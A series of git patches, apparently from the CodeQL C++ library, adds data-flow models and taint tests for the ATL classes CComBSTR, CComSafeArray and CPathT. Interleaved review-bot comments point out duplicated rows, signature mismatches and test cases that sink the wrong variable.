"manual"] + - ["", "CComBSTR", True, "Copy", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["", "CComBSTR", True, "CopyTo", "", "", "Argument[-1]", "Argument[*0]", "value", "manual"] + - ["", "CComBSTR", True, "LoadString", "(HINSTANCE,UINT)", "", "Argument[1]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "LoadString", "(UINT)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "ReadFromStream", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "ReadFromStream", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "WriteToStream", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] + - ["", "CComBSTR", True, "operator BSTR", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CComBSTR", True, "operator&", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CComBSTR", True, "operator+=", "", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] + - ["", "CComBSTR", True, "operator+=", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 0eb636082e2..bade135966b 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -479,8 +479,8 @@ void test_CComBSTR() { CComBSTR b3; b3 += x; sink(b3.m_str); // $ MISSING: ir - sink(static_cast(b3)); // $ MISSING: ir - sink(**&b3); // $ MISSING: ir + sink(static_cast(b3)); // $ ir + sink(**&b3); // $ ir CComBSTR b4; b4.Append(source()); @@ -506,9 +506,9 @@ void test_CComBSTR() { SAFEARRAY safe; b9.Append(source()); b9.BSTRToArray(&safe); - sink(safe.pvData); // $ MISSING: ir + sink(safe.pvData); // $ ir - sink(b9.Copy()); // $ MISSING: ir + sink(b9.Copy()); // $ ir } wchar_t* w = indirect_source(); 
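Review bot: The `ReadFromStream` row appears twice with identical columns (`"Argument[*0]", "Argument[-1]", "taint", "manual"`); one of the two should be dropped, or, if a second flow was intended, replaced by the row that was meant. The stub in atl.cpp also declares `BSTR Detach()` and the move constructor `CComBSTR(CComBSTR&&)`, and neither has a row here. A string that leaves the object through `Detach()` would presumably lose its taint, which shows up as missed results rather than as a test failure. A row parallel to `Copy`, `- ["", "CComBSTR", True, "Detach", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"]`, would cover it.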
From 948be092575f46d24d37c44e0672181809f11f48 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 13:38:38 +0000 Subject: [PATCH 0730/1267] C++: Add an taint step from object to field for 'CComBSTR's. --- cpp/ql/lib/semmle/code/cpp/models/Models.qll | 1 + .../cpp/models/implementations/CComBSTR.qll | 16 ++++++++++++ .../dataflow/taint-tests/atl.cpp | 26 +++++++++---------- 3 files changed, 30 insertions(+), 13 deletions(-) create mode 100644 cpp/ql/lib/semmle/code/cpp/models/implementations/CComBSTR.qll diff --git a/cpp/ql/lib/semmle/code/cpp/models/Models.qll b/cpp/ql/lib/semmle/code/cpp/models/Models.qll index bb63416eaef..9e67eaae5cf 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/Models.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/Models.qll @@ -51,3 +51,4 @@ private import implementations.StructuredExceptionHandling private import implementations.ZMQ private import implementations.Win32CommandExecution private import implementations.CA2AEX +private import implementations.CComBSTR diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CComBSTR.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CComBSTR.qll new file mode 100644 index 00000000000..55d18a52ae4 --- /dev/null +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CComBSTR.qll @@ -0,0 +1,16 @@ +private import cpp +private import semmle.code.cpp.ir.dataflow.FlowSteps +private import semmle.code.cpp.dataflow.new.DataFlow + +/** The `CComBSTR` class from the Microsoft "Active Template Library". */ +class CcomBstr extends Class { + CcomBstr() { this.hasGlobalName("CComBSTR") } +} + +private class Mstr extends Field { + Mstr() { this.getDeclaringType() instanceof CcomBstr and this.hasName("m_str") } +} + +private class MstrTaintInheritingContent extends TaintInheritingContent, DataFlow::FieldContent { + MstrTaintInheritingContent() { this.getField() instanceof Mstr } +} 
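Review bot: `CcomBstr` only matches a class declared in the global namespace (`this.hasGlobalName("CComBSTR")`), which is how the test stub declares it. As far as I know the shipped ATL headers put the class inside `namespace ATL`; if so, the `m_str` taint-inheriting content would not apply to real code, and queries would miss flows without any visible error. If that is confirmed, `CcomBstr() { this.hasGlobalName("CComBSTR") or this.hasQualifiedName("ATL", "CComBSTR") }` covers both spellings. The empty namespace column in the accompanying `.model.yml` rows deserves the same check. The two private classes would also benefit from a one-line comment saying that taint on the object is meant to flow to reads of `m_str`.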
diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index bade135966b..c89b649ec9a 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -459,14 +459,14 @@ void test_CComBSTR() { char* x = indirect_source(); { CComBSTR b(x); - sink(b.m_str); // $ MISSING: ir + sink(b.m_str); // $ ir CComBSTR b2(b); - sink(b2.m_str); // $ MISSING: ir + sink(b2.m_str); // $ ir } { CComBSTR b(10, x); - sink(b.m_str); // $ MISSING: ir + sink(b.m_str); // $ ir } { CComBSTR b(x); @@ -474,33 +474,33 @@ void test_CComBSTR() { CComBSTR b2; sink(b2.m_str); b2 += b; - sink(b2.m_str); // $ MISSING: ir + sink(b2.m_str); // $ ir CComBSTR b3; b3 += x; - sink(b3.m_str); // $ MISSING: ir + sink(b3.m_str); // $ ir sink(static_cast(b3)); // $ ir sink(**&b3); // $ ir CComBSTR b4; b4.Append(source()); - sink(b4.m_str); // $ MISSING: ir + sink(b4.m_str); // $ ir CComBSTR b5; b5.AppendBSTR(b4.m_str); - sink(b5.m_str); // $ MISSING: ir + sink(b5.m_str); // $ ir CComBSTR b6; b6.AppendBytes(x, 10); - sink(b6.m_str); // $ MISSING: ir + sink(b6.m_str); // $ ir CComBSTR b7; b7.ArrayToBSTR(getSafeArray()); - sink(b7.m_str); // $ MISSING: ir + sink(b7.m_str); // $ ir CComBSTR b8; b8.AssignBSTR(b7.m_str); - sink(b8.m_str); // $ MISSING: ir + sink(b8.m_str); // $ ir CComBSTR b9; SAFEARRAY safe; @@ -514,14 +514,14 @@ void test_CComBSTR() { wchar_t* w = indirect_source(); { CComBSTR b(w); - sink(b.m_str); // $ MISSING: ir + sink(b.m_str); // $ ir CComBSTR b2; b2.Attach(w); - sink(b2.m_str); // $ MISSING: ir + sink(b2.m_str); // $ ir } { CComBSTR b(10, w); - sink(b.m_str); // $ MISSING: ir + sink(b.m_str); // $ ir } } From e831cb5f2647ff59a98f5c9ea11e15e3dc61ce33 Mon Sep 17 00:00:00 2001 
From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 13:42:23 +0000 Subject: [PATCH 0731/1267] C++: Add failing tests with 'CComSafeArray'. --- .../dataflow/taint-tests/atl.cpp | 77 +++++++++++++++++ .../dataflow/taint-tests/localTaint.expected | 86 +++++++++++++++++++ 2 files changed, 163 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index c89b649ec9a..a91cd9c88d6 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp 
@@ -525,3 +525,80 @@ void test_CComBSTR() { sink(b.m_str); // $ ir } } + +template +struct CComSafeArray { + CComSafeArray(); + CComSafeArray(const SAFEARRAYBOUND& bound); + CComSafeArray(ULONG ulCount, LONG lLBound); + CComSafeArray(const SAFEARRAYBOUND* pBound, UINT uDims); + CComSafeArray(const CComSafeArray& saSrc); + CComSafeArray(const SAFEARRAY& saSrc); + CComSafeArray(const SAFEARRAY* psaSrc); + + ~CComSafeArray() throw(); + + HRESULT Add(const SAFEARRAY* psaSrc); + HRESULT Add(ULONG ulCount, const T* pT, BOOL bCopy); + HRESULT Add(const T& t, BOOL bCopy); + HRESULT Attach(const SAFEARRAY* psaSrc); + HRESULT CopyFrom(LPSAFEARRAY* ppArray); + HRESULT CopyTo(LPSAFEARRAY* ppArray); + HRESULT Create(const SAFEARRAYBOUND* pBound, UINT uDims); + HRESULT Create(ULONG ulCount, LONG lLBound); + HRESULT Destroy(); + LPSAFEARRAY Detach(); + T& GetAt(LONG lIndex) const; + ULONG GetCount(UINT uDim) const; + UINT GetDimensions() const; + LONG GetLowerBound(UINT uDim) const; + LPSAFEARRAY GetSafeArrayPtr() throw(); + LONG GetUpperBound(UINT uDim) const; + bool IsSizable() const; + HRESULT MultiDimGetAt(const LONG* alIndex, T& t); + HRESULT MultiDimSetAt(const LONG* alIndex, const T& t); + HRESULT Resize(const SAFEARRAYBOUND* pBound); + HRESULT Resize(ULONG ulCount, LONG lLBound); + HRESULT SetAt(LONG lIndex, const T& t, BOOL bCopy); + operator LPSAFEARRAY() const; + T& operator[](long lindex) const; + T& operator[](int nindex) const; + + LPSAFEARRAY m_psa; +}; + +void test_CComSafeArray() { + LPSAFEARRAY safe = getSafeArray(); + sink(safe->pvData); // $ ir + { + CComSafeArray c(safe); + sink(c[0]); // $ MISSING: ir + sink(c.GetAt(0)); // $ MISSING: ir + sink(c.GetSafeArrayPtr()->pvData); // $ MISSING: ir + sink(c.m_psa->pvData); // $ MISSING: ir + } + { + CComSafeArray c; + sink(c[0]); + sink(c.GetAt(0)); + sink(c.GetSafeArrayPtr()->pvData); + c.Add(safe); + sink(c[0]); // $ MISSING: ir + sink(c.GetAt(0)); // $ MISSING: ir + sink(c.GetSafeArrayPtr()->pvData); // $ 
MISSING: ir + sink(static_cast(c)->pvData); // $ MISSING: ir + } + { + CComSafeArray c; + c.Add(source(), true); + sink(c[0]); // $ MISSING: ir + sink(c.GetAt(0)); // $ MISSING: ir + sink(c.GetSafeArrayPtr()->pvData); // $ MISSING: ir + } + { + CComSafeArray c; + c.SetAt(0, source(), true); + sink(c[0]); // $ MISSING: ir + sink(c[0L]); // $ MISSING: ir + } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index becba8e527b..4924d7d817f 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected 
@@ -636,6 +636,92 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:525:10:525:10 | b | | | atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:526:3:526:3 | b | | | atl.cpp:525:10:525:10 | b [post update] | atl.cpp:526:3:526:3 | b | | +| atl.cpp:569:22:569:33 | call to getSafeArray | atl.cpp:570:8:570:11 | safe | | +| atl.cpp:569:22:569:33 | call to getSafeArray | atl.cpp:572:24:572:27 | safe | | +| atl.cpp:569:22:569:33 | call to getSafeArray | atl.cpp:582:11:582:14 | safe | | +| atl.cpp:570:8:570:11 | safe [post update] | atl.cpp:572:24:572:27 | safe | | +| atl.cpp:570:8:570:11 | safe [post update] | atl.cpp:582:11:582:14 | safe | | +| atl.cpp:572:24:572:27 | safe | atl.cpp:572:24:572:28 | call to CComSafeArray | TAINT | +| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:573:8:573:8 | c | | +| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:574:8:574:8 | c | | +| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:575:8:575:8 | c | | +| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:576:3:576:3 | c | | +| atl.cpp:573:8:573:8 | ref arg c | atl.cpp:574:8:574:8 | c | | +| atl.cpp:573:8:573:8 | ref arg c | atl.cpp:575:8:575:8 | c | | +| atl.cpp:573:8:573:8 | ref arg c | atl.cpp:576:3:576:3 | c | | +| atl.cpp:574:8:574:8 | ref arg c | atl.cpp:575:8:575:8 | c | | +| atl.cpp:574:8:574:8 | ref arg c | atl.cpp:576:3:576:3 | c | | +| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:576:3:576:3 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:579:10:579:10 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:580:10:580:10 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:581:10:581:10 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:582:5:582:5 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:583:10:583:10 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | 
atl.cpp:584:10:584:10 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:585:10:585:10 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:586:35:586:35 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:587:3:587:3 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:580:10:580:10 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:581:10:581:10 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:582:5:582:5 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:583:10:583:10 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:584:10:584:10 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:586:35:586:35 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:581:10:581:10 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:582:5:582:5 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:583:10:583:10 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:584:10:584:10 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:586:35:586:35 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:582:5:582:5 | c | | +| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:583:10:583:10 | c | | +| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:584:10:584:10 | c | | +| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:586:35:586:35 | c | | +| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:583:10:583:10 | c | | +| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:584:10:584:10 | c | | +| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:586:35:586:35 | c | | +| atl.cpp:582:5:582:5 
| ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:584:10:584:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:586:35:586:35 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:586:35:586:35 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:586:35:586:35 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:586:35:586:35 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:590:5:590:5 | c | | +| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:591:10:591:10 | c | | +| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:592:10:592:10 | c | | +| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:593:10:593:10 | c | | +| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:594:3:594:3 | c | | +| atl.cpp:590:5:590:5 | ref arg c | atl.cpp:591:10:591:10 | c | | +| atl.cpp:590:5:590:5 | ref arg c | atl.cpp:592:10:592:10 | c | | +| atl.cpp:590:5:590:5 | ref arg c | atl.cpp:593:10:593:10 | c | | +| atl.cpp:590:5:590:5 | ref arg c | atl.cpp:594:3:594:3 | c | | +| atl.cpp:591:10:591:10 | ref arg c | atl.cpp:592:10:592:10 | c | | +| atl.cpp:591:10:591:10 | ref arg c | atl.cpp:593:10:593:10 | c | | +| atl.cpp:591:10:591:10 | ref arg c | atl.cpp:594:3:594:3 | c | | +| atl.cpp:592:10:592:10 | ref arg c | atl.cpp:593:10:593:10 | c | | +| atl.cpp:592:10:592:10 | ref arg c | atl.cpp:594:3:594:3 | c | | +| atl.cpp:593:10:593:10 | ref arg c | atl.cpp:594:3:594:3 | c | | +| atl.cpp:596:24:596:24 | call to CComSafeArray | atl.cpp:597:5:597:5 | c | | +| atl.cpp:596:24:596:24 | call to CComSafeArray | atl.cpp:598:10:598:10 | c | | +| atl.cpp:596:24:596:24 | call to 
CComSafeArray | atl.cpp:599:10:599:10 | c | | +| atl.cpp:596:24:596:24 | call to CComSafeArray | atl.cpp:600:3:600:3 | c | | +| atl.cpp:597:5:597:5 | ref arg c | atl.cpp:598:10:598:10 | c | | +| atl.cpp:597:5:597:5 | ref arg c | atl.cpp:599:10:599:10 | c | | +| atl.cpp:597:5:597:5 | ref arg c | atl.cpp:600:3:600:3 | c | | +| atl.cpp:598:10:598:10 | ref arg c | atl.cpp:599:10:599:10 | c | | +| atl.cpp:598:10:598:10 | ref arg c | atl.cpp:600:3:600:3 | c | | +| atl.cpp:599:10:599:10 | ref arg c | atl.cpp:600:3:600:3 | c | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 5f05417890733959f4bb89c0b2d765370578fab9 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:10:04 +0000 Subject: [PATCH 0732/1267] C++: Add MaD model for 'CComSafeArray'. --- cpp/ql/lib/ext/CComSafeArray.model.yml | 27 +++++++++++++++++++ .../dataflow/taint-tests/atl.cpp | 26 +++++++++--------- 2 files changed, 40 insertions(+), 13 deletions(-) create mode 100644 cpp/ql/lib/ext/CComSafeArray.model.yml diff --git a/cpp/ql/lib/ext/CComSafeArray.model.yml b/cpp/ql/lib/ext/CComSafeArray.model.yml new file mode 100644 index 00000000000..4128ae13e17 --- /dev/null +++ b/cpp/ql/lib/ext/CComSafeArray.model.yml 
@@ -0,0 +1,27 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CComSafeArray", True, "CComSafeArray", "(const CComSafeArray &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CComSafeArray", True, "CComSafeArray", "(const SAFEARRAY &)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "CComSafeArray", "(const SAFEARRAY *)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "Add", "(const SAFEARRAY *)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "Add", "(const T &,BOOL)", "", "Argument[*@0]", "Argument[-1].Field[*m_psa].Field[*@pvData]", "value", "manual"] + - ["", "CComSafeArray", True, "Attach", "", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "CopyFrom", "", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "CopyTo", "", "", "Argument[-1].Field[*m_psa]", "Argument[*0]", "value", "manual"] + - ["", "CComSafeArray", True, "Create", "(const SAFEARRAYBOUND *,UINT)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "GetAt", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "ReturnValue[*@]", "value", "manual"] + - ["", "CComSafeArray", True, "GetLowerBound", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CComSafeArray", True, "GetSafeArrayPtr", "", "", "Argument[-1].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] + - ["", "CComSafeArray", True, "GetUpperBound", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CComSafeArray", True, "MultiDimGetAt", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "Argument[*@1]", "value", "manual"] + - ["", 
"CComSafeArray", True, "MultiDimSetAt", "", "", "Argument[*@1]", "Argument[-1].Field[*m_psa].Field[*@pvData]", "value", "manual"] + - ["", "CComSafeArray", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Field[*m_psa].Field[*@pvData]", "value", "manual"] + - ["", "CComSafeArray", True, "operator LPSAFEARRAY", "", "", "Argument[-1].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] + - ["", "CComSafeArray", True, "operator[]", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "ReturnValue[*@]", "value", "manual"] + - ["", "CComSafeArray", True, "operator=", "(const CComSafeArray&)", "", "Argument[*0].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] + - ["", "CComSafeArray", True, "operator=", "(const CComSafeArray&)", "", "Argument[*0].Field[*m_psa]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "operator=", "(const SAFEARRAY *)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "operator=", "(const SAFEARRAY *)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index a91cd9c88d6..69a79eb7580 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -572,10 +572,10 @@ void test_CComSafeArray() { sink(safe->pvData); // $ ir { CComSafeArray c(safe); - sink(c[0]); // $ MISSING: ir - sink(c.GetAt(0)); // $ MISSING: ir - sink(c.GetSafeArrayPtr()->pvData); // $ MISSING: ir - sink(c.m_psa->pvData); // $ MISSING: ir + sink(c[0]); // $ ir + sink(c.GetAt(0)); // $ ir + sink(c.GetSafeArrayPtr()->pvData); // $ ir + sink(c.m_psa->pvData); // $ ir } { CComSafeArray c; 
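Review bot: The two `operator=` rows for the copy-assignment overload spell the signature as `(const CComSafeArray&)`, while the copy-constructor row at the top of the table writes `(const CComSafeArray &)` with a space. If signature matching is sensitive to that spacing, these rows never apply, and none of the test lines visible in this commit would catch it, because atl.cpp never assigns one CComSafeArray to another. A summary row that fails to match is silent (the only symptom is taint that stops at the call), so I would use one spelling throughout, `"(const CComSafeArray &)"`, and add an assignment case to test_CComSafeArray. Separately, the `Create` row copies the bounds argument `Argument[*0]` into `Argument[-1].Field[*m_psa]` with kind `value`, although a SAFEARRAYBOUND is not the array itself; `taint` looks like the more accurate kind.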
@@ -583,22 +583,22 @@ void test_CComSafeArray() { sink(c.GetAt(0)); sink(c.GetSafeArrayPtr()->pvData); c.Add(safe); - sink(c[0]); // $ MISSING: ir - sink(c.GetAt(0)); // $ MISSING: ir - sink(c.GetSafeArrayPtr()->pvData); // $ MISSING: ir - sink(static_cast(c)->pvData); // $ MISSING: ir + sink(c[0]); // $ ir + sink(c.GetAt(0)); // $ ir + sink(c.GetSafeArrayPtr()->pvData); // $ ir + sink(static_cast(c)->pvData); // $ ir } { CComSafeArray c; c.Add(source(), true); - sink(c[0]); // $ MISSING: ir - sink(c.GetAt(0)); // $ MISSING: ir - sink(c.GetSafeArrayPtr()->pvData); // $ MISSING: ir + sink(c[0]); // $ ir + sink(c.GetAt(0)); // $ ir + sink(c.GetSafeArrayPtr()->pvData); // $ ir } { CComSafeArray c; c.SetAt(0, source(), true); - sink(c[0]); // $ MISSING: ir - sink(c[0L]); // $ MISSING: ir + sink(c[0]); // $ ir + sink(c[0L]); // $ ir } } From 1a79290fd67fe3da4abe481e243c64c9a02f0589 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:12:37 +0000 Subject: [PATCH 0733/1267] C++: Add failing tests with 'CPathT'. --- .../dataflow/taint-tests/atl.cpp | 104 ++++++++ .../dataflow/taint-tests/localTaint.expected | 248 ++++++++++++------ 2 files changed, 267 insertions(+), 85 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 69a79eb7580..35a66099a62 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp 
@@ -602,3 +602,107 @@ void test_CComSafeArray() { sink(c[0L]); // $ ir } } + +template +struct CPathT { + typedef StringType PCXSTR; // simplified + CPathT(PCXSTR pszPath); + CPathT(const CPathT& path); + CPathT() throw(); + + void AddBackslash(); + BOOL AddExtension(PCXSTR pszExtension); + BOOL Append(PCXSTR pszMore); + void BuildRoot(int iDrive); + void Canonicalize(); + void Combine(PCXSTR pszDir, PCXSTR pszFile); + CPathT CommonPrefix(PCXSTR pszOther); + BOOL CompactPathEx(UINT nMaxChars, DWORD dwFlags); + BOOL FileExists() const; + int FindExtension() const; + int FindFileName() const; + int GetDriveNumber() const; + StringType GetExtension() const; + BOOL IsDirectory() const; + BOOL IsFileSpec() const; + BOOL IsPrefix(PCXSTR pszPrefix) const; + BOOL IsRelative() const; + BOOL IsRoot() const; + BOOL IsSameRoot(PCXSTR pszOther) const; + BOOL IsUNC() const; + BOOL IsUNCServer() const; + BOOL IsUNCServerShare() const; + BOOL MakePretty(); + BOOL MatchSpec(PCXSTR pszSpec) const; + void QuoteSpaces(); + BOOL RelativePathTo( + PCXSTR pszFrom, + DWORD dwAttrFrom, + PCXSTR pszTo, + DWORD dwAttrTo); + void RemoveArgs(); + void RemoveBackslash(); + void RemoveBlanks(); + void RemoveExtension(); + BOOL RemoveFileSpec(); + BOOL RenameExtension(PCXSTR pszExtension); + int SkipRoot() const; + void StripPath(); + BOOL StripToRoot(); + void UnquoteSpaces(); + operator const StringType&() const throw(); + operator PCXSTR() const throw(); + operator StringType&() throw(); + CPathT& operator+=(PCXSTR pszMore); + + StringType m_strPath; +}; + +using CPath = CPathT; + +void test_CPathT() { + char* x = indirect_source(); + CPath p(x); + sink(static_cast(p)); // $ MISSING: ir + sink(p.m_strPath); // $ MISSING: ir + + CPath p2(p); + sink(p2.m_strPath); // $ MISSING: ir + + { + CPath p; + p.AddExtension(x); + sink(p.m_strPath); // $ MISSING: ir + } + { + CPath p; + p.Append(x); + sink(p.m_strPath); // $ MISSING: ir + + CPath p2; + p2 += p; + sink(p.m_strPath); // $ MISSING: ir + + 
CPath p3; + p3 += x; + sink(p.m_strPath); // $ MISSING: ir + } + + { + CPath p; + p.Combine(x, nullptr); + sink(p.m_strPath); // $ MISSING: ir + } + { + CPath p; + p.Combine(nullptr, x); + sink(p.m_strPath); // $ MISSING: ir + } + + { + CPath p; + auto p2 = p.CommonPrefix(x); + sink(p2.m_strPath); // $ MISSING: ir + sink(p2.GetExtension()); // $ MISSING: ir + } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 4924d7d817f..961011dbd23 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected 
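Review bot: The two `operator+=` checks in test_CPathT sink the wrong object: after `p2 += p;` and after `p3 += x;` the test calls `sink(p.m_strPath)`, but `p` was already tainted by `p.Append(x)` a few lines earlier, so both expectations hold whether or not `operator+=` propagates anything. They should read `sink(p2.m_strPath);` and `sink(p3.m_strPath);`. The later hunk at `@@ -664,45 +664,45 @@` flips these same two lines to `$ ir`, so that result says nothing about the `operator +=` rows added in CPathT.model.yml. `RelativePathTo` and `RenameExtension` are declared in the stub and modelled later in the series, but no case here exercises them.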
